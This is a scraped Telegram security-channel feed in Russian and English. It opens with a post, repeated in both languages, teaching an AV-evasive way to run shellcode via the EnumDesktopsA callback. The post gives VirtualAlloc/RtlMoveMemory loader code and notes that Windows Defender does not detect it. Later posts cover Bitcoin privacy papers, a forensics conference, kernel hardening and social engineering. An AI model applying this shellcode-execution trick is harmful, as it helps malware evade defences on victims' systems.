|Run shellcode via EnumDesktopsA|
🤙Шизо на связи!
🛡Только в ознакомительных целях!
🦠Статья от известного в узких кругах cocomelonc'a(на канале: AV engines evasion,
Malware development: persistence) про запуск шеллкода посредством EnumDesktopsA из серии "Malware development tricks".
Предыдущие из серии:
💥Download & inject logic + source code
💥Find kernel32.dll base: asm style + source code
Сама по себе функция
Причём, может оперировать только теми рабочими столами, вызывающий процесс которых имеет право доступа
Конечно же программа на C++, моём любимом и одновременно ненавидимом.
Для запуска шеллкода, помимо его наличия, нам потребуется сперва проаллоцировать буффер памяти(ну или выделить, кто как говорит) посредством функцию
WinDef.h:
Детект: 16/66(windows defender - не детектит)
📝Исходный код тут.
🤙The Shizo is in touch!
🛡For educational purposes only
🦠An article from the well-known cocomelonc in narrow circles (on the channel: AV engines evasion,
Malware development: persistence) about running the shellcode via EnumDesktopsA from the series "Malware development tricks".
Previous ones from the series:
💥Download & inject logic + source code
💥Find kernel32.dll base: asm style + source code
The
Moreover, it can operate only on those desktops whose calling process has the right to access
Of course, the program is in C++, my favorite and at the same time hated.
To run the shellcode, in addition to having it, we will first need to allocate a memory buffer (well, or allocate, as anyone says) using the
Detection: 16/66(windows defender - does not detect)
📝The source code is here.
#malware #shellcode #njection
🤙Шизо на связи!
🛡Только в ознакомительных целях!
🦠Статья от известного в узких кругах cocomelonc'a(на канале: AV engines evasion,
Malware development: persistence) про запуск шеллкода посредством EnumDesktopsA из серии "Malware development tricks".
Предыдущие из серии:
💥Download & inject logic + source code
💥Find kernel32.dll base: asm style + source code
Сама по себе функция
EnumDesktopsA нужна для передачи имени каждого рабочего стола определяемой приложением(application-defined) callback-функции и подключается с помощью хэдера winuser.h.Причём, может оперировать только теми рабочими столами, вызывающий процесс которых имеет право доступа
DESKTOP_ENUMERATE.Конечно же программа на C++, моём любимом и одновременно ненавидимом.
Для запуска шеллкода, помимо его наличия, нам потребуется сперва проаллоцировать буффер памяти(ну или выделить, кто как говорит) посредством функцию
VirtualAlloc:LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);Если вдруг кому интересно LPVOID - это указатель на любой тип, который определён в хэдере
WinDef.h:
typedef void *LPVOID;Далее, нужно "скопировать" наш пэйлоад(шеллкод) в эту область памяти:
RtlMoveMemory(mem, my_payload, sizeof(my_payload));После чего, в EnumDesktopsA укажем эту область памяти , как указатель на коллбэк функцию:
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
my_payload, если вдруг кто не понял - как раз наш пэйлоад.Детект: 16/66(windows defender - не детектит)
📝Исходный код тут.
🤙The Shizo is in touch!
🛡For educational purposes only
🦠An article from the well-known cocomelonc in narrow circles (on the channel: AV engines evasion,
Malware development: persistence) about running the shellcode via EnumDesktopsA from the series "Malware development tricks".
Previous ones from the series:
💥Download & inject logic + source code
💥Find kernel32.dll base: asm style + source code
The
EnumDesktopsA function itself is needed to pass the name of each desktop to an application-defined callback function and is connected using a header winuser.h.Moreover, it can operate only on those desktops whose calling process has the right to access
DESKTOP_ENUMERATE.Of course, the program is in C++, my favorite and at the same time hated.
To run the shellcode, in addition to having it, we will first need to allocate a memory buffer (well, or allocate, as anyone says) using the
VirtualAlloc function:LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);If anyone is suddenly interested, LPVOID is a pointer to any type that is defined in the header WinDef.h:
typedef void *LPVOID;Next, we need to "copy" our payload (shellcode) to this memory area:
RtlMoveMemory(mem, my_payload, sizeof(my_payload));After that, in EnumDesktopsA we will indicate this memory area as a pointer to the callback function:
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
my_payload, if suddenly someone did not understand - just our payload.Detection: 16/66(windows defender - does not detect)
📝The source code is here.
#malware #shellcode #njection
👍4❤2
On_the_Routing_Aware_Peering_against_Network_Eclipse_Attacks_in.pdf
1.1 MB
📕On the Routing-Aware Peering against Network-Eclipse Attacks in Bitcoin
#cryptocurrency #BTC #exploitation #Eclipse #Sybil
#cryptocurrency #BTC #exploitation #Eclipse #Sybil
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
😉Привет дорогой подписчик, даже как-то не верится что так быстро прошли почти 4 месяца.
Эти выходные у тебя пройдут замечательно, надеюсь что неделя прошла отлично.
😉Hello dear subscriber, I can't even believe that almost 4 months have passed so quickly.
This weekend will be wonderful for you, I hope that the week has been wonderful.
Эти выходные у тебя пройдут замечательно, надеюсь что неделя прошла отлично.
😉Hello dear subscriber, I can't even believe that almost 4 months have passed so quickly.
This weekend will be wonderful for you, I hope that the week has been wonderful.
🥰14❤4👍3😢1
Forwarded from Мобильный Криминалист
⚡️ Дорогие друзья, уже открыта регистрация на одно из главных событий этой осени – шестую ежегодную конференцию «MOBILE FORENSICS DAY 2022»!
📣 15 сентября компания «Оксиджен Софтвер» совместно с партнерами проведет масштабное мероприятие в области цифровой криминалистики и информационной безопасности, на котором будут представлены:
🔹 современные тренды в исследовании цифровых доказательств и расследовании инцидентов;
🔹 эксклюзивные доклады об особенностях извлечения данных из популярных моделей мобильных устройств, рабочих станций и иных систем;
🔹 уникальные мастер-классы от экспертов индустрии.
Каждый участник сможет:
💬 лично задать вопросы представителям ведущих компаний отрасли;
📲 испытать флагманские программные продукты компаний-участников и стать обладателем их демо-версий;
🔥 отлично провести время на афтерпати;
🎁 получить новые теоретические знания, практический опыт и ценные подарки.
❗️ Участие является бесплатным, необходимо зарегистрироваться. Подробнее на официальном сайте.
📣 15 сентября компания «Оксиджен Софтвер» совместно с партнерами проведет масштабное мероприятие в области цифровой криминалистики и информационной безопасности, на котором будут представлены:
🔹 современные тренды в исследовании цифровых доказательств и расследовании инцидентов;
🔹 эксклюзивные доклады об особенностях извлечения данных из популярных моделей мобильных устройств, рабочих станций и иных систем;
🔹 уникальные мастер-классы от экспертов индустрии.
Каждый участник сможет:
💬 лично задать вопросы представителям ведущих компаний отрасли;
📲 испытать флагманские программные продукты компаний-участников и стать обладателем их демо-версий;
🔥 отлично провести время на афтерпати;
🎁 получить новые теоретические знания, практический опыт и ценные подарки.
❗️ Участие является бесплатным, необходимо зарегистрироваться. Подробнее на официальном сайте.
🔥3👍2
Forwarded from Private Shizo
The Future of OSINT for UK National Security.pdf
1.1 MB
The Future of Open Source Intelligence for UK National Security
📓The paper explores the extent to which the increasing proliferation of PAI – and wider accessibility
of tools leveraging PAI for OSINT – is changing perceptions of modern intelligence. From this
foundation, it asks what the commercial, cultural, policy and technological implications are for
UK national security stakeholders.
📓The paper explores the extent to which the increasing proliferation of PAI – and wider accessibility
of tools leveraging PAI for OSINT – is changing perceptions of modern intelligence. From this
foundation, it asks what the commercial, cultural, policy and technological implications are for
UK national security stakeholders.
👍3
Mixing detection on Bitcoin transactions.pdf
2.2 MB
|Обнаружение использования миксеров в биткойн-транзакциях|
Вот ещё одна из публикаций, которую использовал в работе для идентификации владельцев биткоин-кошельков.
Все транзакции в сети биткоин прозрачные, миксеры выдают на выходе повторяющиеся закономерности на уровне транзакций и цепочек: когда мы закидываем в биткоинмешалку(у кого заиграла кувалда в голове, это нормально) наши битки и начинаем перемешивать посредством большого пула псевдо-случайных транзакций, то получаем всё-равно не особо трудную задачу для специалиста, который будет идентифицировать владельца(ев) кошелька.
хотя, стоит отметить, что всё-таки альткоины очень сильно усложняют работу по идентификации владельца и одного универсального решения, конечно же нет.
После общения с некоторыми специалистами из Интерпола и Европола, утвердился в том насколько быстрее чем в России происходит расследование преступлений, в которых фигурируют криптовалюты.
#cryptocurrency #BTC #deanonymization
Вот ещё одна из публикаций, которую использовал в работе для идентификации владельцев биткоин-кошельков.
Все транзакции в сети биткоин прозрачные, миксеры выдают на выходе повторяющиеся закономерности на уровне транзакций и цепочек: когда мы закидываем в биткоинмешалку(у кого заиграла кувалда в голове, это нормально) наши битки и начинаем перемешивать посредством большого пула псевдо-случайных транзакций, то получаем всё-равно не особо трудную задачу для специалиста, который будет идентифицировать владельца(ев) кошелька.
хотя, стоит отметить, что всё-таки альткоины очень сильно усложняют работу по идентификации владельца и одного универсального решения, конечно же нет.
После общения с некоторыми специалистами из Интерпола и Европола, утвердился в том насколько быстрее чем в России происходит расследование преступлений, в которых фигурируют криптовалюты.
#cryptocurrency #BTC #deanonymization
👍2🥰1
|Bitcoin Wallet Privacy Threat Model|
🔓Наглядный пример модели угроз конфиденциальности при использовании различных
биткоин-кошельков. Хоть и работа 16-года, но очень наглядно показывает проблемы проектировки приложений/сервисов.
🔓A clear example of a model of privacy threats when using various
bitcoin wallets. Although the work of 2016, but very clearly shows the problems of designing applications / services.
#cryptocurrency #BTC #security
🔓Наглядный пример модели угроз конфиденциальности при использовании различных
биткоин-кошельков. Хоть и работа 16-года, но очень наглядно показывает проблемы проектировки приложений/сервисов.
🔓A clear example of a model of privacy threats when using various
bitcoin wallets. Although the work of 2016, but very clearly shows the problems of designing applications / services.
#cryptocurrency #BTC #security
👍2
Forwarded from Мобильный Криминалист
📢 Друзья, мы продолжаем рассказывать подробности о предстоящем грандиозном событии – MOBILE FORENSICS DAY 2022!
🔹 Сегодня представляем вам одного из спикеров нашей конференции – Security researcher, автор популярного телеграм-канала «0% Privacy».
💬 В свободное время приглашенный эксперт занимается реверс-инжинирингом, форензикой и анализом оверлейных сетей. На протяжении пяти лет проводил консультации по безопасности, приватности и анонимности в различных сетях. Параллельно изучал и практиковал способы идентификации пользователей, которые занимаются преступной деятельностью посредством анонимных средств коммуникации.
⚡️ Не упустите шанс услышать доклад на тему «Расследование киберпреступлений на основе оверлейных сетей (Tor, I2P)».
❗️Напоминаем, участие в конференции является бесплатным, но необходимо зарегистрироваться. Успейте гарантированно занять свое место на уникальном мероприятии!
🔹 Сегодня представляем вам одного из спикеров нашей конференции – Security researcher, автор популярного телеграм-канала «0% Privacy».
💬 В свободное время приглашенный эксперт занимается реверс-инжинирингом, форензикой и анализом оверлейных сетей. На протяжении пяти лет проводил консультации по безопасности, приватности и анонимности в различных сетях. Параллельно изучал и практиковал способы идентификации пользователей, которые занимаются преступной деятельностью посредством анонимных средств коммуникации.
⚡️ Не упустите шанс услышать доклад на тему «Расследование киберпреступлений на основе оверлейных сетей (Tor, I2P)».
❗️Напоминаем, участие в конференции является бесплатным, но необходимо зарегистрироваться. Успейте гарантированно занять свое место на уникальном мероприятии!
🔥4👍1
🗺Это пожалуй одна из лучших роадмап по DFIR, которых видел, да хоть это и faq, но рассматривать нужно как нечто иное.
Также, приложу оттуда ещё и список ресурсов для изучения DFIR.
🗺This is probably one of the best DFIR roadmaps I've seen, and even though it's an faq, it should be considered as something else.
Also, I will attach from there also a list of resources for studying DFIR.
#forensics #malware #roadmap
Также, приложу оттуда ещё и список ресурсов для изучения DFIR.
🗺This is probably one of the best DFIR roadmaps I've seen, and even though it's an faq, it should be considered as something else.
Also, I will attach from there also a list of resources for studying DFIR.
#forensics #malware #roadmap
❤2👍1🤔1
|kconfig-hardened-check|
🤙Шизо на связи!
🛡Сегодня потихоньку начну освещать тему с безопасностью ядра линукс.
Устройство кернела уже разобрано не один десяток раз, да и нужно держать в голове, что ядро - нужно для связи лоу-левел железяк и высокоуровненых компонетов операционки(процессами).
Сейчас не будем вдаваться уровень ниже: железяки и уровень выше: пользовательские процессы, а остановимся именно на кернеле.
На всякий случай напишу, что код выполняемый системой(Linux) на проце выполняется в двух режимах: ядерный(режим ядра) и пользовательский, такое же разделение и в памяти. Из этого вытекает то, что когда код выполняется в режиме ядра, то мы получаем неограниченный доступ железякам, а в пользовательском у нас руки относительно связаны и мы можем взаимодействовать с кернелом через интерфейс системных вызовов(SCI).
Далее, рассматриваю тему поста.
Собственно линукс кернел имеет массу способов и методов усиления безопасности.
Если говорить про варианты усиления, то большая часть не включена в дистрибутивы из коробки.
Для упрощения проверки конфигов советую использовать kconfig-hardened-check, а далее уже собственноручно включаем необходимые нам опции после проверки.
Ведь для анонимности нам нужна ещё и высокая безопасность системы. Kconfig-hardened-check
может понадобиться как раз для проверки Kconfig параметров и параметров cmdline кернела.
Автор инструмента не требуется в представлении, Александр Попов занимается разработкой линукс кернела, работая в Positive Technologies, а также является исследователем безопасности.
В ключе зациты кернела можно отметить его карту защиты ядра линукс.
Использовать довольно просто:
1️⃣сперва переходим в директорию, куда разместили копию репозитория
2️⃣запускаем бинарь, расположенный в директории /bin бинарь
и проверим файл кернела cmdline, расположенный в директории
флага "
полностью запуск будет выглядеть так:
🤙Шизо на связи!
🛡Сегодня потихоньку начну освещать тему с безопасностью ядра линукс.
Устройство кернела уже разобрано не один десяток раз, да и нужно держать в голове, что ядро - нужно для связи лоу-левел железяк и высокоуровненых компонетов операционки(процессами).
Сейчас не будем вдаваться уровень ниже: железяки и уровень выше: пользовательские процессы, а остановимся именно на кернеле.
На всякий случай напишу, что код выполняемый системой(Linux) на проце выполняется в двух режимах: ядерный(режим ядра) и пользовательский, такое же разделение и в памяти. Из этого вытекает то, что когда код выполняется в режиме ядра, то мы получаем неограниченный доступ железякам, а в пользовательском у нас руки относительно связаны и мы можем взаимодействовать с кернелом через интерфейс системных вызовов(SCI).
Далее, рассматриваю тему поста.
Собственно линукс кернел имеет массу способов и методов усиления безопасности.
Если говорить про варианты усиления, то большая часть не включена в дистрибутивы из коробки.
Для упрощения проверки конфигов советую использовать kconfig-hardened-check, а далее уже собственноручно включаем необходимые нам опции после проверки.
Ведь для анонимности нам нужна ещё и высокая безопасность системы. Kconfig-hardened-check
может понадобиться как раз для проверки Kconfig параметров и параметров cmdline кернела.
Автор инструмента не требуется в представлении, Александр Попов занимается разработкой линукс кернела, работая в Positive Technologies, а также является исследователем безопасности.
В ключе зациты кернела можно отметить его карту защиты ядра линукс.
Использовать довольно просто:
1️⃣сперва переходим в директорию, куда разместили копию репозитория
2️⃣запускаем бинарь, расположенный в директории /bin бинарь
kconfig-hardened-check
с флагом "-c"(проверка файла кернела kconfig на соответствие настройкам) и аргументом в виде файла конфигурации кернела /boot/config-ядро-версия и проверим файл кернела cmdline, расположенный в директории
/proc с помощьюфлага "
-l"полностью запуск будет выглядеть так:
./bin/kconfig-hardened-check -c /boot/config-ядро-версия -l /proc/cmdline#linux #kernel #security
👍5❤1
|kconfig-hardened-check|
🤙The Shizo is in touch!
🛡Today I will slowly begin to cover the topic of Linux kernel security.
The kernel device has already been disassembled more than a dozen times, and you need to keep in mind that the core is needed to connect low-level hardware and high-level components of the operating system (processes).
Now we will not go into the level below: hardware and the level above: user processes, but we will focus on the kernel.
Just in case, I will write that the code executed by the system (Linux) on the process is executed in two modes: nuclear (kernel mode) and user, the same separation in memory. It follows from this that when the code is executed in kernel mode, we get unlimited access to hardware, and in user mode our hands are relatively tied and we can interact with the kernel through the system call interface (SCI).
Next, I consider the topic of the post.
Actually Linux kernel has a lot of ways and methods to enhance security.
If we talk about gain options, then most of them are not included in distributions out of the box.
To simplify the verification of configs, I advise you to use kconfig-hardened-check, and then we turn on the options we need after checking with our own hands.
After all, for anonymity, we also need high security of the system. Kconfig-hardened-check
it may be necessary just to check the Kconfig parameters and the parameters of the cmdline kernel.
The author of the tool is not required in the presentation, Alexander Popov is engaged in the development of Linux kernel, working at Positive Technologies, and is also a security researcher.
In the key of the defence kernel, you can note its Linux Kernel Defence Map.
It is quite simple to use:
1️⃣first we go to the directory where we placed a copy of the repository
2️⃣run the binary located in the /bin directory, the
with the "
kernel configuration file
the full launch will look like this:
🤙The Shizo is in touch!
🛡Today I will slowly begin to cover the topic of Linux kernel security.
The kernel device has already been disassembled more than a dozen times, and you need to keep in mind that the core is needed to connect low-level hardware and high-level components of the operating system (processes).
Now we will not go into the level below: hardware and the level above: user processes, but we will focus on the kernel.
Just in case, I will write that the code executed by the system (Linux) on the process is executed in two modes: nuclear (kernel mode) and user, the same separation in memory. It follows from this that when the code is executed in kernel mode, we get unlimited access to hardware, and in user mode our hands are relatively tied and we can interact with the kernel through the system call interface (SCI).
Next, I consider the topic of the post.
Actually Linux kernel has a lot of ways and methods to enhance security.
If we talk about gain options, then most of them are not included in distributions out of the box.
To simplify the verification of configs, I advise you to use kconfig-hardened-check, and then we turn on the options we need after checking with our own hands.
After all, for anonymity, we also need high security of the system. Kconfig-hardened-check
it may be necessary just to check the Kconfig parameters and the parameters of the cmdline kernel.
The author of the tool is not required in the presentation, Alexander Popov is engaged in the development of Linux kernel, working at Positive Technologies, and is also a security researcher.
In the key of the defence kernel, you can note its Linux Kernel Defence Map.
It is quite simple to use:
1️⃣first we go to the directory where we placed a copy of the repository
2️⃣run the binary located in the /bin directory, the
kconfig-hardened-check binarywith the "
-c" key (checking the kconfig kernel file for compliance with the settings) and an argument in the form kernel configuration file
/boot/config-kernel-version
and check the cmdline kernel file located in the /proc directory using the "-l" flagthe full launch will look like this:
./bin/kconfig-hardened-check -c /boot/config-kernel-version -l /proc/cmdline#linux #kernel #security
👍2🤮1
🔓Интересная на мой взгляд статья от mrd0x про способы социальной инженерии для получения начального доступа. Ведь как известно - чаще приходится проявлять творческие навыки в таком процессе, поэтому рекомендую прочитать полностью.
🔓 An interesting article in my opinion from mrd0x about social engineering methods for obtaining initial access. After all, as you know, you often have to show creative skills in such a process, so I recommend reading in full.
#socialEngineering
🔓 An interesting article in my opinion from mrd0x about social engineering methods for obtaining initial access. After all, as you know, you often have to show creative skills in such a process, so I recommend reading in full.
#socialEngineering
👍4❤1